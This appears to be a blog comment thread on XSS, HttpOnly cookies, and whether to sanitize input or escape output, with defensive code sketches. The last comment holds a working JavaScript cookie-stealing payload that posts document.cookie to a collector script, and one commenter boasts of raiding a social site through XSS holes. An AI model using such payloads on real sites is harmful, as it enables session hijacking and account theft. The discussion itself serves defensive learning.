Protecting Your Cookies: HttpOnly

I’m not sure why you people are being so hard-headed. He didn’t say that he didn’t ALSO fix the sanitizer. But like all things in web security, adding the HttpOnly flag raises the bar. Why not do it? He isn’t advocating using HttpOnly in lieu of other good security measures.

As for sanitizing input versus output, I prefer to sanitize output. There are too many other systems downstream that are impacted by sanitizing the input. I write enterprise systems, not forums. There is a big difference. I can’t pass a company name of Smith%27s%20Dairy to some back-end COBOL system. They wouldn’t know what to do with it.

For those of you that decide to sanitize your input, it must be nice to write web applications that live in a vacuum…

The Web needs an architectural do-over.

With recent vulnerabilities like the Gmail vulnerability, I’m really starting to question whether it is possible to write a secure web app that people will still want to use. Even if it is, a web app seems like little more than a swarm of technologies that interact in far more ways than are immediately obvious.

Why not keep a dictionary that maps the cookie credential to the IP
used when the credential was granted, and make sure that the IP
matches the dictionary entry on every page access?
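
A minimal sketch of that dictionary idea, in Python; the structure and names (session_ips, issue_session, and so on) are invented for illustration and not tied to any particular framework:

    import secrets

    # session token -> IP address recorded when the credential was granted
    session_ips = {}

    def issue_session(client_ip):
        token = secrets.token_hex(16)      # opaque session credential
        session_ips[token] = client_ip     # remember where it was issued
        return token

    def request_is_valid(token, client_ip):
        # reject unknown tokens, and tokens presented from a different IP
        return session_ips.get(token) == client_ip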

Most of us get our IP addresses through DHCP, which means they can change whenever our system (or router) is rebooted.

I’m still quite leery of your sanitiser, for the reasons I described on RefactorMyCode: you’re doing blacklisting even if you think you’re doing whitelisting. Your blacklist is more or less anything that looks like <BLAH BLAH X BLAH>, where X isn’t on the whitelist. As you can see, it’s very hard to write that rule correctly. Your bouncer is still kicking bad guys out of the queue. Instead your bouncer should be picking up good guys and carrying them through the door. If the bouncer messes up, the default behaviour should be that nobody gets in, not that everybody gets in!

As an interesting side note to those who say you should sanitize late rather than early:

I have run into all kinds of XSS when opening tables in my database. Yes, I learned that opening said tables in PHPMyAdmin might not be a good idea.

That was an interesting experience to be sure.

I have to agree with what most people are saying. Allowing direct HTML posting that other users can see is sure to cause at least headaches, if not major problems. You’re better off using some kind of wiki system, or a subset of HTML where only the tags you are interested in are allowed.

Hey, but how do I set the HttpOnly flag on cookies? I certainly did not find it in the preferences/options dialog.
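
(For what it’s worth, HttpOnly isn’t a browser preference; the server adds it to the Set-Cookie header it sends. A rough sketch using Python’s standard http.cookies module, with a placeholder cookie name and value:)

    from http.cookies import SimpleCookie

    cookie = SimpleCookie()
    cookie["session"] = "abc123"           # placeholder value
    cookie["session"]["httponly"] = True   # hides the cookie from document.cookie

    # Emits: Set-Cookie: session=abc123; HttpOnly
    print(cookie["session"].output())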

IP spoofing over UDP = easy, IP spoofing over TCP = hard

The biggest problem in security is that a lot of people think that hard is the same as impossible. It is not. We can patch this and that hole after we’ve completed implementing our design and make it harder to attack our system, but we’ll never really know if we’re 100% safe.

In that regard, giving up is not lame. Playing catch-up is better than not playing at all. It’s also better than going back to the drawing board when you’re well into beta (aka scope creep), unless you have infinite budget. I do believe, though, that in the design stage, as Schneier says, security is about trade-offs. If a feature introduces security risks that are absolutely not tolerable, then it might indeed be a good idea to drop it altogether, if designing built-in protection against that class of attacks is not feasible.

IP spoofing over UDP = easy, IP spoofing over TCP = hard

As someone who has written an IP stack, I’m not really sure what about TCP makes it particularly hard. I’m not saying it isn’t, I just don’t see why it would be offhand.

It might (might) be tough to push aside the rightful IP holder from an established connection. However, initiating a connection with a spoofed IP should be just as easy as spoofing your IP in UDP and getting the victim to respond to you.

Friends don’t let friends allow XSS attacks.

When you emit a session ID, record the IP. Naturally you also emitted it over SSL, in which case you record the cert they were granted for the session. Therefore each request is validated by IP and cert?

It’s amazing how easily cookies can be hijacked. Shouldn’t there be some way to encrypt them too so that even if they do manage to get the cookie, it’s useless?

I have run into all kinds of XSS when opening tables
in my database. Yes, I learned that opening said tables
in PHPMyAdmin might not be a good idea.

That just shows you that PHPMyAdmin is not a safe program. The PHPMyAdmin program could not possibly know whether or not the data in the database has been scrubbed. So it should default to scrubbing it on output. It also can’t enforce the rule that all input should be scrubbed before putting it into the database.

It also shows that all programs fall into this same category. There could be an SQL injection vulnerability in your code that lets the user force data into the database unscrubbed. So ALL programs (including yours) should make the assumption that the data could be tainted and scrub it before outputting it to the screen.

It is the one true way to be safe. Making assumptions is always a bad idea. Be sure. Scrub all output.
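
A minimal sketch of that rule in Python, treating whatever comes out of the database as potentially tainted; the field and function names are invented for illustration:

    import html

    def render_comment(row):
        # Assume nothing about what's stored: escape every field at the moment
        # it is written into HTML, whether or not the input was ever scrubbed.
        return '<p class="comment">{}</p>'.format(html.escape(row["body"]))

    # A tainted row straight from the database stays harmless on screen:
    print(render_comment({"body": "<script>alert(document.cookie)</script>"}))
    # -> <p class="comment">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>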

@omalley

If you don’t allow unsafe characters, then just completely remove them from input. Done

Think about what this means. What is an unsafe character?
In the context of the user’s message, nothing. It’s only when you go to insert that message directly into an HTML/JS document that certain characters take on a different meaning. And so at that time you escape them. This way the user’s message displays as they intended it AND it doesn’t break the HTML. Everyone wins.

It’s the same when you’re putting it into SQL, or into a shell command, or into a URL, etc. You can’t store your data escaped for every single purpose in your DB; you need to do the escaping exactly when it’s needed and keep your original data raw and intact.

Your policy of stripping unsafe characters gets in the way of the user’s perfectly legitimate message. And there’s absolutely no reason for that.

You store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%

There is no hope required. You don’t have to always remember if you have a standard method of building DB queries and building HTML documents/templating, and it’s tested. And you should have this.

Where and when to escape (assuming a DB store):

  1. Untrusted data comes in
  2. Validate it (do NOT alter it)
    And, if it’s valid
  3. Store it (escape for SQL here)

later, if you want to display it in an HTML page:
retrieve from DB and escape for HTML

or, if you want to use it in a unix command line:
retrieve from DB and escape for shell

or, into a URL:
retrieve from DB and URL encode

etc…

The key is not MODIFYING the user’s data. Just accept or reject. Then you escape if necessary when you use it in different contexts.

Now you can do anything you want with your data. You don’t have to impose confusing constraints on what your users can and can’t say.
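
A rough sketch of that flow in Python: store the raw value (via a parameterized query), then let each sink do its own escaping. The validation rule and the sample value are placeholders:

    import html
    import shlex
    import urllib.parse

    def validate(message):
        # accept or reject only; never rewrite the user's data
        return len(message) <= 2000

    raw = "Smith's Dairy & Sons"            # stored verbatim in the DB

    as_html  = html.escape(raw)              # when writing it into an HTML page
    as_url   = urllib.parse.quote(raw)       # when putting it into a URL
    as_shell = shlex.quote(raw)              # when passing it to a unix command line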

Good comments. Are there any web pages which serve as checklists against XSS so we ASP.NET developers can implement all these secure ideas?

(Jeff, I saw a comment from you which didn’t have a different bg color)

I absolutely agree with correct above. Too many times I see programs that won’t let you include single quotes or other such characters because they consider them to be dangerous. There is no point in that.

As I said above, you need to consider all data to potentially be tainted. There is no way to guarantee that the data came from a user and passed through your input scrubber. It could have been inserted using an SQL injection attack or could have come from some COBOL/RPG program upstream. So you have to scrub it on output anyway. Why scrub it in both places and end up causing headaches for other systems that you integrate with?

@O’Malley

you said:

@bex you just screwed anyone who sits behind a proxy server.

um… no.

A proxy means multiple usernames sharing one IP. That’s totally fine. It’s no different than me running two browsers, logged in as two users. My example blocks multiple IPs sharing one username. Totally different. And as @Clifton says, IP spoofing over TCP is pretty hard… especially if you rotate the session ID.

Back to the issue of sanitizing, I again agree with @Clifton. You don’t sanitize input: you FRIGGING REJECT it!

In other words, escape ALL angle brackets, unless it’s from a string that EXACTLY MATCHES safe HTML, like:

<b></b>
<i></i>
<ul></ul>
<ol></ol>
<li></li>
<pre></pre>
<code></code>

Don’t allow ANYTHING fancy in between the angle brackets. No attributes. No styles. No quotes. No spaces. No parentheses. Yes, it’s strict, but who cares?

Being helpful is a security hole.
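
A minimal sketch of that sort of default-deny filter in Python; the tag list matches the one above, but the regex and overall approach are just one reading of the suggestion, not a vetted sanitizer:

    import html
    import re

    ALLOWED = {"b", "i", "ul", "ol", "li", "pre", "code"}   # bare tags only
    TAG = re.compile(r"</?([a-z]+)>")   # nothing fancy between the brackets

    def escape_unless_whitelisted(text):
        out, pos = [], 0
        for m in TAG.finditer(text):
            out.append(html.escape(text[pos:m.start()]))     # default: escape it
            # keep the tag only if it exactly matches the whitelist
            out.append(m.group(0) if m.group(1) in ALLOWED else html.escape(m.group(0)))
            pos = m.end()
        out.append(html.escape(text[pos:]))
        return "".join(out)

    print(escape_unless_whitelisted("<b>hi</b> <img src=x onerror=alert(1)>"))
    # -> <b>hi</b> &lt;img src=x onerror=alert(1)&gt;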

Hehe… I recall raiding a certain social networking website (none of the obvious ones). Someone in the channel we were in found a lot of XSS vulnerabilities and used the same setup described in this blog, plus I recommended a similar FF extension, Modify HTTP Headers. Pretty good read, unlike the past entries…

You don’t sanitize input: you FRIGGING REJECT it!

And if the requirements of your application include the ability to accept such input… then what do you suggest? I just love how programmers think that they get the final say when it comes to functional requirements.

Hell, users don’t need to be able to enter single quotes anyway. If I strip single quotes out of the input then my crappy anti-SQL injection code hack will actually appear to work sometimes.

@bex

A proxy means multiple usernames sharing one IP. That’s totally fine.

What I think O’Malley was talking about is large ISPs (e.g. AOL) who may push their users through a different proxy IP on every single request. These are the users you’d be screwing over. A few large European ISPs do this too.

With AOL, they maintain a public list of those proxy subnets (http://webmaster.info.aol.com/proxyinfo.html) so if it’s an issue you can make your application treat all those IP addresses as one big IP. None of the other ISPs maintain such a list though, so those users would continue to get screwed.

Your method does add some extra protection, but it inconveniences a lot of users. In any business I’ve worked in, kicking out all of AOL is not something management will allow. And at the places where you need the security the most (e.g. online banks), that’s just not an option.

The amount of protection you’re adding is debatable too. You’re still allowing people behind the same single proxy IP to steal each other’s sessions. And at some ISPs, that can be a hell of a lot of people.

I’m not sure the tradeoff for pissing off a bunch of other customers is worth it.

A better approach, depending on your application, is to require re-entry of the user’s password for critical actions.

It really depends on the application though, and what’s at stake. Dealing with a stolen session ID at a pr0n site is different to dealing with one at a bank.
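
A tiny sketch of that re-authentication idea in Python; the session structure and the five-minute window are arbitrary assumptions:

    import time

    REAUTH_WINDOW = 300   # seconds since the password was last re-entered

    def critical_action_allowed(session):
        # session["last_password_check"] is set whenever the user re-enters
        # their password; a stale or missing check blocks the critical action
        return time.time() - session.get("last_password_check", 0) < REAUTH_WINDOW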

As others have pointed out, scrubbing input data is not the correct approach. Here’s why:

  1. The way data needs to be scrubbed depends on the context of how it is going to be used. You can’t know up front how the data will ultimately be used, so you can’t make the proper decision of how it should be scrubbed when it is entered. For example, the OWASP sample scrubber routines distinguish between data that is going to be output as JavaScript, HTML attributes, and raw HTML (as well as a couple of others).

  2. You can’t guarantee that all data that ends up in your database will have come through your input scrubber. It can come from another compromised system, SQL injection, or even flaws in your own input scrubber.

  3. Once you find out that XSS data exists in your database it is nearly impossible to fix. For example, if you find out that your original input scrubber was flawed you now have to figure out how to get rid of all of the problem data. If you use output scrubbing instead of input scrubbing you can simply alter your output scrubber and leave the data alone. Always assuming that the data could be bad means that it can stay bad in the database without impacting the application.

  4. There is no reason to scrub data more than once. You have to do it on output anyway for the reasons listed above.

  5. Other systems are likely to need the data and will puke if it is already scrubbed. Even if you don’t interface with any other systems now, you never know when your boss is going to come to you and say that his boss wants to be able to run some simple queries using Crystal Reports, in which case your scrubbed input data can’t easily be unscrubbed before use.

  6. Scrubbed data can mess up certain types of SQL statements. For example, depending on your scrubbing mechanism, sorting might be broken. LIKE clauses may also not work correctly. You want the data in your database to be in a pure, unaltered form for the best results (see the small illustration after this list).

These are just a few reasons. There could be many more.
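
To make point 6 concrete, here is a small illustration (SQLite and the names are just for demonstration) of how storing pre-escaped data breaks LIKE matching, while raw storage plus output escaping keeps both the query and the page correct:

    import html
    import sqlite3

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (name TEXT)")

    # input-scrubbed storage: the apostrophe is already HTML-escaped in the DB
    db.execute("INSERT INTO customers VALUES (?)", ("O&#39;Brien",))
    # raw storage: keep the name intact, escape only when rendering HTML
    db.execute("INSERT INTO customers VALUES (?)", ("O'Brien",))

    # the LIKE clause only finds the raw row; the pre-escaped one is invisible
    print(db.execute("SELECT name FROM customers WHERE name LIKE 'O''%'").fetchall())
    # -> [("O'Brien",)]
    print(html.escape("O'Brien"))   # escape at output time instead: O&#x27;Brien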

Your JavaScript from the remote server is hardly ideal. Here is some better code I developed while researching this security issue. In order to create a deliberately vulnerable ASP.NET page I had to use two page directives: ValidateRequest=false and EnableEventValidation=false.

// build a script element that pulls the Dojo loader from AOL's CDN
var jscript = document.createElement('script');
jscript.setAttribute('type', 'text/javascript');
jscript.setAttribute('djConfig', 'isDebug: true');
jscript.setAttribute('src', 'http://o.aolcdn.com/dojo/1.1.1/dojo/dojo.xd.js');
document.getElementsByTagName('head')[0].appendChild(jscript);

// once the page has loaded, post the first link's text, the link itself,
// and the document cookies to the collecting script
window.onload = func;
function func() {
	dojo.xhrPost({
		url: 'http://localhost/study/php/cookie-monster.php',
		content: {u: document.links[0].innerText, l: document.links[0], c: document.cookie}
	});
}